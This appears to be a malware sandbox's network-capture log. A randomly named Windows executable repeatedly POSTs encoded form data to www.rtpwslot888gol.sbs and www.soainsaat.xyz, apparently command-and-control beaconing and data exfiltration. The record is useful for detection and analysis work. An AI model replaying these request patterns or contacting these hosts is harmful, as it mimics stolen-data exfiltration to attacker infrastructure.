Nov 20, 2024 04:21:42.892791033 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENBQHX0pD2lIa61j6uhTrIeqLBEdPaIbEHzGbBHND1vtsKvcGzuDIB8syMZ6CglSQf3W2nQ%2FEV8Ld9mFjqe7KhLMl60WXopMLkTAnYLgCR5hvRi%2F4%2FZ7gYJVNux0pz8DtsgJLB3luIj7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554fb9cf0072ad-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 [TRUNCATED] Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['\|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0fi:
Nov 20, 2024 04:21:42.892821074 CET	163	IN	Data Raw: 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8 ce d3 5c 26 7d 16 c6 ea fa 12 54 04 12 41 d8 f2 Data Ascii: - 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	64873	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:44.841202021 CET	768	OUT	POST /jmkz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.rtpwslot888gol.sbs Origin: http://www.rtpwslot888gol.sbs Referer: http://www.rtpwslot888gol.sbs/jmkz/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 37 39 4a 61 72 53 2f 54 37 2f 68 34 62 49 6d 4f 76 70 79 35 42 42 56 41 65 30 6f 73 49 4f 61 38 78 41 7a 50 59 39 34 74 67 61 38 63 7a 43 32 42 49 53 55 2f 36 53 4f 39 66 7a 46 69 51 50 65 76 66 73 56 36 41 64 4f 49 61 73 4e 32 39 36 7a 51 65 48 46 77 39 73 35 74 41 41 41 6f 6e 2f 72 58 6f 65 4c 66 78 69 68 7a 71 6d 63 38 67 36 53 42 49 4a 53 4a 51 64 47 6b 78 4f 5a 62 4b 37 37 56 43 30 45 4c 68 6d 57 4d 79 66 56 6c 73 58 4e 71 6b 4e 51 38 7a 2f 58 63 48 79 6f 69 54 72 73 75 67 6c 6a 33 64 49 6a 79 47 51 6c 61 4b 53 6f 39 67 31 33 32 78 77 2f 2f 63 41 43 56 56 4a 4c 43 49 72 62 4b 37 34 33 45 6d 62 33 31 48 33 38 70 56 76 34 4b 64 75 63 3d Data Ascii: xDq=79JarS/T7/h4bImOvpy5BBVAe0osIOa8xAzPY94tga8czC2BISU/6SO9fzFiQPevfsV6AdOIasN296zQeHFw9s5tAAAon/rXoeLfxihzqmc8g6SBIJSJQdGkxOZbK77VC0ELhmWMyfVlsXNqkNQ8z/XcHyoiTrsuglj3dIjyGQlaKSo9g132xw//cACVVJLCIrbK743Emb31H38pVv4Kduc=
Nov 20, 2024 04:21:45.445719957 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ByT08AV%2BOvmYByFpasqkVTX6Z2C6CbU8SU212SnifY5SupVdY4fDH%2BhgP1NzKit7ZstAMzIh8gaek6vMismXWsAEmSiUKPWnCUoM5EXv5ToYRp%2B%2FdIJGHWoVPF7TVUOeuNfc31n0cXxf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554fc9bcbfc333-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 [TRUNCATED] Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['\|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0fi:
Nov 20, 2024 04:21:45.445760012 CET	165	IN	Data Raw: 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8 ce d3 5c 26 7d 16 c6 ea fa 12 54 04 12 41 Data Ascii: - 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	64874	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:47.398952007 CET	10850	OUT	POST /jmkz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.rtpwslot888gol.sbs Origin: http://www.rtpwslot888gol.sbs Referer: http://www.rtpwslot888gol.sbs/jmkz/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 37 39 4a 61 72 53 2f 54 37 2f 68 34 62 49 6d 4f 76 70 79 35 42 42 56 41 65 30 6f 73 49 4f 61 38 78 41 7a 50 59 39 34 74 67 5a 63 63 76 67 75 42 53 78 4d 2f 37 53 4f 39 57 54 46 76 51 50 66 71 66 6f 41 7a 41 64 54 7a 61 75 46 32 2f 5a 4c 51 59 32 46 77 33 73 35 74 43 41 41 70 6a 2f 71 54 6f 64 7a 45 78 69 78 7a 71 6d 63 38 67 37 69 42 4f 59 53 4a 58 74 47 6e 6d 2b 5a 58 63 4c 37 74 43 30 63 62 68 6d 62 78 79 72 68 6c 74 30 6c 71 69 2f 34 38 78 66 58 61 41 79 6f 4d 54 72 70 73 67 6c 2b 49 64 4b 43 66 47 53 35 61 4a 79 6c 39 35 6b 48 4f 6f 32 6a 44 4a 48 75 70 62 65 62 43 51 34 76 72 2f 64 32 65 32 49 72 41 63 46 64 46 4a 39 6c 4a 48 35 57 49 53 55 4c 51 4e 54 49 6e 48 4d 42 45 75 37 78 39 51 4c 75 6c 2f 2f 73 67 47 30 67 6a 6f 6e 65 64 77 67 71 31 75 30 2b 4c 38 34 39 31 70 5a 58 36 4b 5a 38 32 6d 2b 70 4f 4a 59 56 6c 4c 77 78 48 57 46 4d 6d 32 4a 64 55 36 65 4c 42 54 65 4b 6c 68 36 5a 66 63 4b 6a 45 66 67 39 68 4c 74 4c 74 49 42 7a 71 6c 70 41 54 70 6e 51 54 37 6b 73 43 4e 79 4e 4b 39 54 [TRUNCATED] Data Ascii: xDq=79JarS/T7/h4bImOvpy5BBVAe0osIOa8xAzPY94tgZccvguBSxM/7SO9WTFvQPfqfoAzAdTzauF2/ZLQY2Fw3s5tCAApj/qTodzExixzqmc8g7iBOYSJXtGnm+ZXcL7tC0cbhmbxyrhlt0lqi/48xfXaAyoMTrpsgl+IdKCfGS5aJyl95kHOo2jDJHupbebCQ4vr/d2e2IrAcFdFJ9lJH5WISULQNTInHMBEu7x9QLul//sgG0gjonedwgq1u0+L8491pZX6KZ82m+pOJYVlLwxHWFMm2JdU6eLBTeKlh6ZfcKjEfg9hLtLtIBzqlpATpnQT7ksCNyNK9TbX3zPs3LYjROfQ0IC/bxNBPutVPejg2gJIQQb4B5VrfMIEoeJQ0zhKwH5AoNUdfHlflkChY4OL9ZbJLzTNs340pnsVK/BdgcQPEJH3b374aVnVH2c3JFnvobEOjcmItw6XdHJJj5RPTW5OPZhJaGn1NHoMTno5rBfVwkLDFTwI7DRgdZTr8mAr48lClVLhi7hKbhAI4kegGn6DRQTS5OrZG84QrACOqgZcGd2CYfROvsF5XWrctyvi3MBdkqPnkPl7n/yPx9RcJmst4wmdPU0ET8TXz1zEs/vJ2Fc22pv6gA+JIDhcF0TVOS27EpuL/LGKwv0t4gsTTUIsuLdtAtMfuY2YFn8S+r38kUbSKL/nBj1F/l0OckJmaXq+DAmab8v5IYSPNXRy9Z5prptObRd297P2YcYCjhyMwCkfdz1kzW8v+7YFuQqRGL94SSptM2OpmvkygCzsxhNcxxbPsaGOqdmCKY9wUALrBRmKJnIbli65OVijDJPFxbxu3dHm6C0VE/22BvWdIywXTey6qYbQZSqJk+dicWb04D3/CuzSQeNwQok4WvUKzVPaqTMAW4mD8ciky5Fr9zRfvqNVO3noICHgYSb23598IC9vi+kFKjve6ty+1VemQYVHTCyHh07DNXHksEoTbpg21a8ZYGL5kWhjvxY1vUXb [TRUNCATED]
Nov 20, 2024 04:21:47.977319002 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YiimYCuvOKWT%2BCuFvduxDE%2FrojzLep9fL3FYb02ahFo4U8JYMCeGcd4owZJp3G%2FBKvgdCyvPqtGNWOJpUx58d%2BgJkICMc%2B9O7bfyxOIeE9hrt3NcCzrM274PsicJUugI%2BHR80LFy5Crm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554fd98b36c34a-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1633&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10850&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['\|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0
Nov 20, 2024 04:21:47.977364063 CET	172	IN	Data Raw: 12 66 ed 8b f7 69 3a 9e ce 2d 08 8d 1d 17 20 f2 c5 39 5a 4f 4c d6 14 6a eb ad 9e 18 4b 60 3b 16 70 13 aa cc a1 b7 e9 55 e0 06 cf 4b f6 d9 b9 e2 8b 26 10 44 11 9e fe 60 91 dd ce b0 9a 0c be 30 5e 5c 73 cc 71 71 6d ad 6e cb b8 ce d3 5c 26 7d 16 c6 Data Ascii: fi:- 9ZOLjK`;pUK&D`0^\sqqmn\&}TA/4;/#9w=Co'=ct2l;[d#t{0_x%,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	64875	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:49.952490091 CET	474	OUT	GET /jmkz/?xDq=2/h6on3i5cEqQ5is+ICgXmY2AkJVcLKq2EbSJtEbgpp6+wmMOVJuzUCOWh5aW8O1XJ0bOuSOAqNryZfPUVNa+soYNjAnpoeEkPK1vyRK5nou96mjQ4WwK9s=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.rtpwslot888gol.sbs User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:21:50.548938990 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T6ddLPlEHXJk5m4ldJD7Sz%2BY%2FKbZrQWUMSn0C0%2F8%2BTSfkKSsBvhXu%2BHAiQhLbd7m3OsiqM8NEbUxCKjf0XSVwQLlq%2FjChYkQ9ZAHTiwEN25g5CYQtgV5NdLLf0JSiVlyQpPW8209j6Rz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554fe9af091906-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1475&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED] Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; h
Nov 20, 2024 04:21:50.548968077 CET	448	IN	Data Raw: 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e Data Ascii: eight:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; lin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	64876	85.159.66.93	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:55.793890953 CET	733	OUT	POST /gqm1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/gqm1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 59 46 54 61 69 72 43 47 49 6a 37 6b 38 6a 38 52 64 66 33 4a 77 54 2b 43 56 37 6d 45 4f 4b 35 37 49 65 65 53 73 75 59 42 6a 69 39 6a 42 4e 52 39 70 57 58 51 56 65 75 39 30 49 4a 79 6f 70 63 54 4b 45 59 46 46 6e 70 69 38 7a 6f 57 62 43 50 59 55 5a 74 6d 5a 39 42 71 75 4e 74 44 75 4e 67 30 56 4c 55 2b 6c 46 56 6a 75 5a 48 37 58 46 77 4e 4c 34 6f 67 2b 32 4e 74 4a 38 4f 4a 75 53 74 41 72 47 4a 48 75 69 6c 68 4a 75 76 37 30 4e 55 48 6a 74 55 53 31 4c 5a 74 74 78 72 30 4f 4b 71 42 77 37 74 56 67 69 56 6b 6f 4e 74 33 71 32 75 4d 52 55 30 4f 76 66 47 52 47 56 56 53 38 61 41 4b 74 51 3d 3d Data Ascii: xDq=YFTairCGIj7k8j8Rdf3JwT+CV7mEOK57IeeSsuYBji9jBNR9pWXQVeu90IJyopcTKEYFFnpi8zoWbCPYUZtmZ9BquNtDuNg0VLU+lFVjuZH7XFwNL4og+2NtJ8OJuStArGJHuilhJuv70NUHjtUS1LZttxr0OKqBw7tVgiVkoNt3q2uMRU0OvfGRGVVS8aAKtQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	64877	85.159.66.93	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:58.339066029 CET	753	OUT	POST /gqm1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/gqm1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 59 46 54 61 69 72 43 47 49 6a 37 6b 2f 43 73 52 63 38 66 4a 6e 44 2b 42 61 62 6d 45 41 71 35 33 49 65 43 53 73 73 30 33 6a 51 5a 6a 42 70 56 39 6f 55 2f 51 46 4f 75 39 2f 6f 4a 33 6d 4a 63 4d 4b 45 55 37 46 69 52 69 38 7a 38 57 62 44 2f 59 56 6f 74 6c 59 74 42 6f 69 74 74 46 6a 74 67 30 56 4c 55 2b 6c 42 38 47 75 5a 66 37 55 31 41 4e 4b 62 77 68 68 47 4e 75 65 4d 4f 4a 34 69 74 4d 72 47 4a 31 75 67 41 38 4a 74 48 37 30 49 6f 48 6a 2f 77 64 37 37 59 6d 77 42 71 55 4b 62 53 4d 34 2b 41 70 67 53 4e 6f 6e 39 74 49 76 77 6a 57 41 6c 56 5a 39 66 69 69 62 53 63 6d 78 5a 39 44 32 62 6c 51 71 4c 56 39 46 42 47 41 36 34 5a 78 64 57 71 68 62 59 63 3d Data Ascii: xDq=YFTairCGIj7k/CsRc8fJnD+BabmEAq53IeCSss03jQZjBpV9oU/QFOu9/oJ3mJcMKEU7FiRi8z8WbD/YVotlYtBoittFjtg0VLU+lB8GuZf7U1ANKbwhhGNueMOJ4itMrGJ1ugA8JtH70IoHj/wd77YmwBqUKbSM4+ApgSNon9tIvwjWAlVZ9fiibScmxZ9D2blQqLV9FBGA64ZxdWqhbYc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	64878	85.159.66.93	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:22:00.889226913 CET	10835	OUT	POST /gqm1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/gqm1/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 59 46 54 61 69 72 43 47 49 6a 37 6b 2f 43 73 52 63 38 66 4a 6e 44 2b 42 61 62 6d 45 41 71 35 33 49 65 43 53 73 73 30 33 6a 51 52 6a 42 38 42 39 75 7a 4c 51 58 65 75 39 6a 59 4a 32 6d 4a 63 46 4b 45 4d 33 46 69 56 55 38 78 45 57 62 68 33 59 46 4d 5a 6c 42 64 42 6f 71 4e 74 45 75 4e 68 30 56 4c 45 79 6c 46 67 47 75 5a 66 37 55 33 59 4e 4d 49 6f 68 79 57 4e 74 4a 38 4f 56 75 53 74 6f 72 47 52 66 75 67 55 73 49 64 6e 37 30 70 59 48 6d 4e 6f 64 35 62 59 6b 78 42 71 32 4b 61 76 4d 34 36 68 59 67 52 51 48 6e 2f 78 49 75 78 36 4b 56 6d 46 75 2b 49 61 42 42 6a 45 75 32 65 45 41 2b 72 4a 45 37 36 31 4a 58 56 32 7a 69 2f 4d 61 4a 45 36 66 49 75 70 65 4d 56 54 41 4a 47 66 36 30 47 42 2f 4c 77 76 6b 52 74 38 52 2b 6c 64 61 50 6b 70 66 69 6b 37 45 35 47 50 68 53 54 71 61 45 42 59 38 53 4e 55 7a 70 4d 4b 76 66 63 7a 4b 51 68 74 55 6f 57 48 34 4b 45 45 6b 71 75 4b 74 37 73 65 71 6c 57 48 33 77 5a 31 57 4a 54 31 30 75 62 54 77 78 63 6f 76 65 68 50 63 53 37 2f 63 52 74 43 6e 63 38 44 78 43 4a 61 36 6f 63 [TRUNCATED] Data Ascii: 